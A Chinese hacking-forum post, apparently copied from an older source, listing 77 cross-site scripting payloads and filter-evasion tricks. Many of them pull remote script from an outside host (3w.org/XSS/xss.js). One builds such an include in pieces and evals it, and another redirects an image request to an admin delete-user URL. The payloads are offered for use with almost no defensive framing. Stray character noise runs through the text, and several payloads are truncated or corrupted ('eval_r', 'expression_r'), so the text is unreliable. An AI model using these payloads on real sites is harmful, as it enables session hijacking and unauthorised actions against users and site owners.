貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。7 `2 T9 D. d( V. J2 A! v! i0 E
(1)普通的XSS JavaScript注入: j4 @ E4 S) ?
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>1 X7 K% M; O* z/ o" }% ~" o
(2)IMG标签XSS使用JavaScript命令3 h( C9 P5 X5 I
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 A' N2 @0 G& o; M6 [6 q1 {4 a+ l1 [(3)IMG标签无分号无引号6 l8 o# _9 F) l: g' F7 b# \2 T
<IMG SRC=javascript:alert(‘XSS’)>0 V: E9 Z/ N" s+ c0 R7 [1 k
(4)IMG标签大小写不敏感3 a' d+ B' x! y- c, S
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
/ V7 |! _5 U* a(5)HTML编码(必须有分号): i. A, Z: h/ w" n
<IMG SRC=javascript:alert(“XSS”)>
3 I# R( }: ~1 H4 A6 ^(6)修正缺陷IMG标签. K l5 L: H6 I
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>( M; j" ~8 r K
1 p' S3 v& ?& W {$ f$ z* H
+ C. E6 {) W8 d. W: X(7)formCharCode标签(计算器)
" j/ \; _# X/ t+ { }- k0 Q4 y<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
. r1 U. }+ a! `4 m* R& _(8)UTF-8的Unicode编码(计算器)
$ Q+ x/ [" K! t9 q" f7 q- f' K) W<IMG SRC=jav..省略..S')>0 d2 _, K, c+ C2 J+ k$ n, U1 w$ [8 Y
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
- u) a0 I: c( b; Z' h* E<IMG SRC=jav..省略..S')>
- u: _/ j% o" W: x9 B- k# o0 F(10)十六进制编码也是没有分号(计算器)+ G" F& G( ]0 X+ c$ i% q' l
<IMG SRC=java..省略..XSS')>' K; k) c( P1 q) Z+ ?# ? ]% w
(11)嵌入式标签,将Javascript分开
; j1 e) M# w2 _6 G<IMG SRC=”jav ascript:alert(‘XSS’);”>
* k6 E' ?7 k( `" X(12)嵌入式编码标签,将Javascript分开
& J# Q$ b" ^) m<IMG SRC=”jav ascript:alert(‘XSS’);”>, [0 ]# E% R- ?* J' s! q7 V) _/ U4 ^
(13)嵌入式换行符/ H0 d1 C/ q0 z0 O% I. b
<IMG SRC=”jav ascript:alert(‘XSS’);”>
: S; P5 f+ ?7 Z* x/ _; L1 r(14)嵌入式回车
6 v7 @4 l6 ~7 Q! V1 M+ S<IMG SRC=”jav ascript:alert(‘XSS’);”>
- b9 u$ X' y+ b7 o4 H7 g7 l5 K5 W) n(15)嵌入式多行注入JavaScript,这是XSS极端的例子
" l2 W: I; ]' ?, a<IMG SRC=”javascript:alert(‘XSS‘)”>
8 J% s( _$ m( o4 Y(16)解决限制字符(要求同页面)* E; r: V! T1 ^4 g2 j' p) Z
<script>z=’document.’</script>6 \( E+ o# |* Q' H2 W( M
<script>z=z+’write(“‘</script># V6 ?2 l# F$ f
<script>z=z+’<script’</script># f; ]1 v7 e; d# [& P* [
<script>z=z+’ src=ht’</script>2 ~. [1 }' o2 {! L* x# r) e
<script>z=z+’tp://ww’</script>5 y5 C& W0 ]3 V4 y* P+ G
<script>z=z+’w.shell’</script>
. O, i; T) J7 `4 i% o. j' |<script>z=z+’.net/1.’</script>$ @ [) w- W* q8 k R
<script>z=z+’js></sc’</script>
! |, U3 l4 L# o& p. y<script>z=z+’ript>”)’</script>% t* C: P( m1 f0 f9 r/ ?' L
<script>eval_r(z)</script>
! W: m9 s' M" B7 y+ u(17)空字符12-7-1 T00LS - Powered by Discuz! Board
3 H0 F5 M2 _. `, {https://www.t00ls.net/viewthread ... table&tid=15267 2/6+ |; [7 ?' S3 a) u7 B+ v* f
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out6 p m, R* Y2 R4 _; V
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用9 C5 j# M& N0 B% j3 _
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
) J$ l" @7 S# k(19)Spaces和meta前的IMG标签+ ?9 `' P+ @% c. A# S4 X) T) g
<IMG SRC=” javascript:alert(‘XSS’);”>! P, k, c$ ^% O% w# X
(20)Non-alpha-non-digit XSS
# {& W/ X1 T2 E<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
# g, z) X: D% j$ f. j(21)Non-alpha-non-digit XSS to 2
- l3 G+ W2 V' q/ l; _, x g, q<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>( x0 K: b& a$ y M) e1 x3 B( l# k
(22)Non-alpha-non-digit XSS to 3 v3 f; ^' k' |9 Y
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>% E+ \# H4 w) b. U! |) T
(23)双开括号. }1 R/ l6 j# i2 r
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
! \$ `, C2 d$ P* o1 G(24)无结束脚本标记(仅火狐等浏览器) u0 M# V: \) J* {% L' a& J& l
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>0 d0 ^! `1 Z5 S. Z
(25)无结束脚本标记2
w! {; K% |+ k$ v e9 a<SCRIPT SRC=//3w.org/XSS/xss.js>
6 l. F; P# [( t(26)半开的HTML/JavaScript XSS4 y" Z2 ?( N4 h/ I# n7 I# z9 e
<IMG SRC=”javascript:alert(‘XSS’)”' z f1 t5 Z- M# n! x$ z
(27)双开角括号
- q- C. g3 e' y3 z5 G( |( ^2 L7 o<iframe src=http://3w.org/XSS.html <- x, q; h: V, v3 f6 k# \2 n
(28)无单引号 双引号 分号+ ]3 W! Q/ U1 k' g* _
<SCRIPT>a=/XSS/
# L3 [1 v. O, v8 A* g. P+ `alert(a.source)</SCRIPT>! k) G; x$ a X2 q
(29)换码过滤的JavaScript
7 q9 @0 [9 I% Y) q+ U- }\”;alert(‘XSS’);//
3 u9 K3 l* W2 P% c( L(30)结束Title标签# v& [6 R9 L2 g* E3 q3 u5 w0 @
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>1 [% m& M: p8 \/ k
(31)Input Image2 z2 n& v U+ f
<INPUT SRC=”javascript:alert(‘XSS’);”>
5 p" b9 K/ @7 z2 K9 }(32)BODY Image
- `9 D0 c; g; h' R( `<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
9 m7 Q1 n( f+ `1 D7 Z(33)BODY标签
2 Y# B' s$ s6 C+ k, q<BODY(‘XSS’)>" u9 v9 Z! E0 K( p! d7 G3 G
(34)IMG Dynsrc, G3 T: E% X! A5 Z% v4 [" W* K+ \
<IMG DYNSRC=”javascript:alert(‘XSS’)”>/ |( @, a( ^/ Y) ~
(35)IMG Lowsrc
6 Z% r/ }# s+ X P+ g* R# V<IMG LOWSRC=”javascript:alert(‘XSS’)”>6 O+ x4 l- t' n7 h1 r0 q
(36)BGSOUND7 G" R5 i( r) \/ X; j0 E
<BGSOUND SRC=”javascript:alert(‘XSS’);”>; m* [+ e! {* r$ N) t% _0 a
(37)STYLE sheet
" }* d% @" |$ b% L" m8 R9 O9 g7 G3 _$ A; y<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
0 `6 r8 j. b# ]1 _: {# d, p; |(38)远程样式表4 E9 l% F* G) q/ S! a9 K
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
1 ?3 M1 v& V) s& {, i0 _(39)List-style-image(列表式)
y0 c! h: h$ n7 ] w! X, b, b3 X<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
8 B. F2 \$ a1 C(40)IMG VBscript
1 N. e: X2 D2 m' G$ [1 K) I+ i<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
/ ~) V" n" N% L, I2 J(41)META链接url
2 K; x( _* Z8 c/ q* ?% D
7 W9 {6 {0 A2 j+ ?& U0 k# K
! g. x( e: @$ @<META HTTP-EQUIV=”refresh” CONTENT=”0;# [; o) O! f6 }9 z- F8 P
URL=http://;URL=javascript:alert(‘XSS’);”>/ _& r2 q( `' i8 {# {: c$ g6 _; ~
(42)Iframe; d0 L+ L2 b* d, F' d' F" w6 d/ ~
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
* i; ^3 q* D! b7 P+ }+ B( l5 z+ v. s(43)Frame( Y, w% @ q2 Q2 G
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board" A! T* }! x( L+ U( x/ j6 u
https://www.t00ls.net/viewthread ... table&tid=15267 3/6, w0 }1 g$ Z9 ?: c6 F( ] ^
(44)Table9 a& ^5 b+ L8 t4 Y4 [
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>3 z$ o& b8 E1 Y& h. Z2 C
(45)TD( S0 F( m4 i6 Y; b) ^7 b
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>. O0 o5 l% E7 ^6 o% ~
(46)DIV background-image
% y* {! o, Q# |, v" j6 {; _<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
, e# A" h$ y4 k; ]! J- C(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-* {; K8 M& Y* W; q
8&13&12288&65279)
! p( G n; j R) c<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>/ |, G! N, O M ]6 M) S7 `/ i
(48)DIV expression% N; c9 X6 g6 L6 L
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" A4 L. C0 D7 {- g3 e* Z- u0 w(49)STYLE属性分拆表达; r* R" ]. ]* {0 m, L+ u1 Q Y6 X: R
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
: n" H4 ~: t1 {6 ~% {(50)匿名STYLE(组成:开角号和一个字母开头)
! A3 r) g5 h% E! ^) r) p<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
! C( X7 S* ~" M/ X(51)STYLE background-image) S# A) M7 R/ Y7 t- G* _; _
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A$ P% h1 G& r. |# B$ M8 h' n; L4 v
CLASS=XSS></A>2 W5 S9 b' @6 c* J
(52)IMG STYLE方式
# a" [* l( \/ X- x0 x$ a, cexppression(alert(“XSS”))’>
1 S+ G4 N5 j8 K6 I- S; ~& P(53)STYLE background* J8 J) z6 B& P
<STYLE><STYLE$ l$ x4 m; C! L2 n
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
, C. q6 J3 d D(54)BASE2 B2 G8 b+ y0 F' _; [! i5 S
<BASE HREF=”javascript:alert(‘XSS’);//”>3 j+ Y) I. b& ?1 k. n' Q; G" _) c
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
1 x: c2 r ? f/ i6 Q<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
2 p% A5 r3 V& l6 A' b7 ](56)在flash中使用ActionScrpt可以混进你XSS的代码
* {2 I$ |' @3 ]8 ja=”get”;
3 V0 a! `8 Z! J1 ] A8 ob=”URL(\”";
8 ] \ s2 S! r6 Oc=”javascript:”;4 R3 W5 d* ? e
d=”alert(‘XSS’);\”)”;( [+ g% z7 |& a5 h- ^
eval_r(a+b+c+d);" [# g% g6 R) J B) H" ?5 [ f
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上( ]! F2 [4 p: \3 D8 U3 b& t' q
<HTML xmlns:xss>, W: M# y ~2 M. m- c
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
. T! ^$ R1 ]3 p. ]<xss:xss>XSS</xss:xss>
5 x/ }# g# Y K: r</HTML>
% q* K. ?. {1 k$ ^/ ](58)如果过滤了你的JS你可以在图片里添加JS代码来利用
6 L3 s( X" n, x/ P<SCRIPT SRC=””></SCRIPT>- H7 X% Y& i! `' ?' _. W; q
(59)IMG嵌入式命令,可执行任意命令
* X9 H4 I# F" _<IMG SRC=”http://www.XXX.com/a.php?a=b”>
I, Q( F9 R8 G(60)IMG嵌入式命令(a.jpg在同服务器)/ d9 r4 |0 w' V& I/ v
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser ]5 w* q2 p$ W
(61)绕符号过滤" k5 h* G- G/ E
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>) m9 [) n- a3 I7 C& e2 J3 L
(62)
8 ^% W3 M1 }+ I) k6 ?. q6 a<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ N" e3 Y3 d- ]2 D$ d" C(63)
1 Z! \+ d! f- M5 Y/ }4 Z6 O<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
6 X# r% F, b, d$ X(64): B- a7 `8 [6 B% o' j4 |
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
- ]2 C6 M; J9 i7 D(65)5 c" @' A) G( L* b. U
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>, W$ k7 y% O2 H: ~; w) |: |. F
(66)12-7-1 T00LS - Powered by Discuz! Board. r# b3 j# N( z7 l
https://www.t00ls.net/viewthread ... table&tid=15267 4/64 o( {# u# d' l7 n% I' h K# K
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>/ {% w! T) b* i, b6 T. W
(67)7 \2 o' l7 V/ R7 o0 Y* n& J
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>9 \1 e, [4 I( |8 n" h# X( U# q! i
</SCRIPT>8 n% {1 O( P: o+ M* V
(68)URL绕行0 n6 q& T( U& j2 l/ V, E4 `
<A HREF=”http://127.0.0.1/”>XSS</A>
; X1 v- c4 C! ~5 f- J9 X6 Q(69)URL编码7 L9 c0 J9 C3 Z4 `; ?& O
<A HREF=”http://3w.org”>XSS</A>/ P h$ R, x3 [6 V! {
(70)IP十进制. \1 W: z _" h8 z2 s' d. O4 I
<A HREF=”http://3232235521″>XSS</A>
4 n- c/ V: S4 }/ \& d: J+ P6 j(71)IP十六进制9 D3 N+ S# M) p) O
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>0 d' K& i, }0 c9 S; M: U, J
(72)IP八进制 |+ C) n4 w F5 B7 v! X0 ~
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
& p, u! j( X" T2 ](73)混合编码
: _5 B$ m, u. m e# A4 V' Q3 Q<A HREF=”h
- U3 B& c$ X) \) [8 |tt p://6 6.000146.0×7.147/”">XSS</A>
% J5 O2 h/ N6 k( E(74)节省[http:]
6 Z, F3 W2 U3 A. F" K* H# G4 J" D<A HREF=”//www.google.com/”>XSS</A>; c7 ]4 O0 Z- ]5 }2 F0 ~3 F4 F
(75)节省[www]/ }+ A% t6 E4 P5 E: v
<A HREF=”http://google.com/”>XSS</A>
% J1 |2 _: h/ p/ m7 { f( O(76)绝对点绝对DNS
7 C9 a9 I4 t4 Q9 x0 @3 O<A HREF=”http://www.google.com./”>XSS</A>
6 R$ }/ T" h1 u$ V. |8 ?(77)javascript链接
: {! X& O* e8 x& N& A( ]+ a( {5 R<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>% ]2 H3 B/ p4 M. R
% g Z7 i' Z! q4 ?+ }& \6 B
原文地址:http://fuzzexp.org/u/0day/?p=14
3 h7 [# I' Z8 }4 R3 C& `5 s7 d. | } y! I0 P
|
发表于 2013-4-19 19:22:37
收藏
支持
反对